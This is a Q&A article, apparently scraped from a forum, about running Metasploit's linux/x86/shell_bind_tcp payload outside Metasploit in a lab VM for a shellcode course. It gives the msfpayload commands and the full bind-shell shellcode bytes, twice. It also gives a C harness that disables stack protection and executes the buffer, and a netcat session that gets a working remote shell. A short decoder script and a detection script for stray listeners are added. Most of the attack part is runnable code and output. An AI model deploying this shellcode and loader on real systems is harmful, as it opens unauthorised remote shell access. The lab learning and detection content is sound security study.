This article describes how to run the linux/x86/shell_bind_tcp payload standalone. The approach may be useful to anyone facing the same problem, so follow along below.

Question

I'm running a Metasploit payload in a sandbox c program.

Below is a summary of the payload of interest. From there I generate some shellcode and load it up in my sandbox, but when I run it the program will simply wait. I think this is because it's waiting for a connection to send the shell, but I'm not sure.

How do I go about:

  1. Generating shellcode
  2. Loading it into my sandbox
  3. Successfully get a /bin/sh shell <- this is the part I'm stuck on.

Basic setup:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
[sudo] password for max: 

       Name: Linux Command Shell, Bind TCP Inline
     Module: payload/linux/x86/shell_bind_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 200
       Rank: Normal

Provided by:
  Ramon de C Valle <[email protected]>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

Generating shellcode:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C

Sandbox program with shellcode:

#include <stdio.h>
#include <string.h>
/*
 * Pipeline used to extract the opcode bytes from a compiled binary as a C string:
 * objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
 */

/* linux/x86/shell_bind_tcp as emitted by msfpayload (78 bytes, LPORT=4444) */
unsigned char code[] = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

int main(void)
{
  /* strlen() stops at the first 0x00 byte, which here is the high byte of
   * sin_family in the pushed sockaddr_in (offset 20), so this prints 20
   * rather than 78; sizeof(code) - 1 gives the real length. */
  printf("Shellcode Length:  %zu\n", strlen(code));

  /* Treat the buffer as a function and jump into it (hence -z execstack below). */
  int (*ret)(void) = (int (*)(void))code;

  ret();

  return 0;
}

Compile and run. However, this is where I'm not sure how to get a /bin/sh shell:

max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20
(program waiting here...waiting for a connection?)

In terminal one I run my shellcode program:

max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

Now in terminal two, I check for tcp listeners. Giving -n to suppress host name resolution, -t for tcp, -l for listeners, and -p to see the program names.

I can see the shellcode program on port 4444:

max@ubuntu-vm:~$ sudo netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
max@ubuntu-vm:~$ 

Connecting with telnet, and it seems like it was successful but still no sh shell.

max@ubuntu-vm:~$ telnet 0.0.0.0 4444
Trying 0.0.0.0...
Connected to 0.0.0.0.
Escape character is '^]'.

How do I get an sh shell?
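Why the sandbox prints a length of 20 for a 78-byte payload, and where the listening port is encoded, can be checked offline. The script below is an added example, not part of the question or of Metasploit; it decodes the hex string embedded in the sandbox program above and looks for the push of a sockaddr_in prefix (AF_INET followed by the port in network byte order).

```python
import re
import struct

# The payload bytes exactly as the sandbox program above embeds them.
SHELLCODE_C_LITERAL = r'''
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80"
'''

AF_INET = 2

def decode_c_literal(literal):
    """Convert a C string literal made of \\xNN escapes into the raw bytes it denotes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))

def strlen_view(code):
    """Length as C's strlen() sees it: everything before the first 0x00 byte."""
    nul = code.find(b"\x00")
    return len(code) if nul < 0 else nul

def count_syscalls(code):
    """Number of 'int 0x80' (cd 80) instruction sites in the payload."""
    return code.count(b"\xcd\x80")

def find_bind_port(code):
    """Return the port from a 'push imm32' (opcode 0x68) whose immediate starts a
    sockaddr_in: sin_family == AF_INET (little-endian) followed by sin_port in
    network byte order. Returns None if no such push is present."""
    for i in range(len(code) - 4):
        if code[i] != 0x68:
            continue
        family = struct.unpack("<H", code[i + 1:i + 3])[0]
        port = struct.unpack(">H", code[i + 3:i + 5])[0]
        if family == AF_INET:
            return port
    return None

if __name__ == "__main__":
    code = decode_c_literal(SHELLCODE_C_LITERAL)
    print("real length     :", len(code))            # 78, as msfpayload reports
    print("strlen() length :", strlen_view(code))    # 20: the 0x00 inside sin_family
    print("int 0x80 sites  :", count_syscalls(code))
    print("bind port       :", find_bind_port(code))  # 4444 == LPORT
```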

Recommended answer

Generate shellcode, compile and run:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

Now, in terminal 2. Check for connections and finally connect using netcat. Note that the $ doesn't appear but the shell is still there:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh
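On the defensive side, the netstat listing above is exactly the evidence a host check looks for: a wildcard-bound listener owned by an unexpected program. The script below is an added example, not part of the answer; it parses netstat -ntlp output and flags such listeners. The sample listing is constructed from the shellcode line shown on this page plus two hypothetical allowlisted services, and the allowlist itself is an assumption for the example.

```python
# Constructed sample: the shellcode listener from the answer's netstat output, plus
# hypothetical sshd and cupsd entries added for the example.
NETSTAT_SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:22        0.0.0.0:*           LISTEN      812/sshd
tcp        0      0 127.0.0.1:631     0.0.0.0:*           LISTEN      901/cupsd
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode
tcp6       0      0 :::22             :::*                LISTEN      812/sshd
"""

# Assumed allowlist of programs expected to listen on this host (example only).
ALLOWED_LISTENERS = {"sshd", "cupsd"}
WILDCARD_HOSTS = {"0.0.0.0", "::"}

def parse_listeners(text):
    """Parse 'netstat -ntlp' output into one dict per TCP socket in LISTEN state."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] not in ("tcp", "tcp6") or fields[5] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")   # ':::22' -> ('::', '22')
        pid, _, prog = fields[6].partition("/")     # '3326/shellcode'; '-' when unknown
        rows.append({"proto": fields[0], "host": host, "port": int(port),
                     "pid": pid, "prog": prog})
    return rows

def suspicious_listeners(text, allowed=ALLOWED_LISTENERS):
    """Listeners bound to all interfaces whose program is not on the allowlist.
    A socket with no resolvable program name (netstat prints '-') is reported too."""
    return [r for r in parse_listeners(text)
            if r["host"] in WILDCARD_HOSTS and r["prog"] not in allowed]

if __name__ == "__main__":
    for r in suspicious_listeners(NETSTAT_SAMPLE):
        print(f"unexpected {r['proto']} listener on port {r['port']}: "
              f"pid {r['pid']} ({r['prog'] or '?'})")
```

Run it against live output with `sudo netstat -ntlp | python3 check.py` after swapping NETSTAT_SAMPLE for sys.stdin.read(); without sudo the program column is '-' and every wildcard listener is reported.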

This concludes the article on how to run the linux/x86/shell_bind_tcp payload standalone. We hope the recommended answer helps, and thank you for your continued support!

10-18 23:09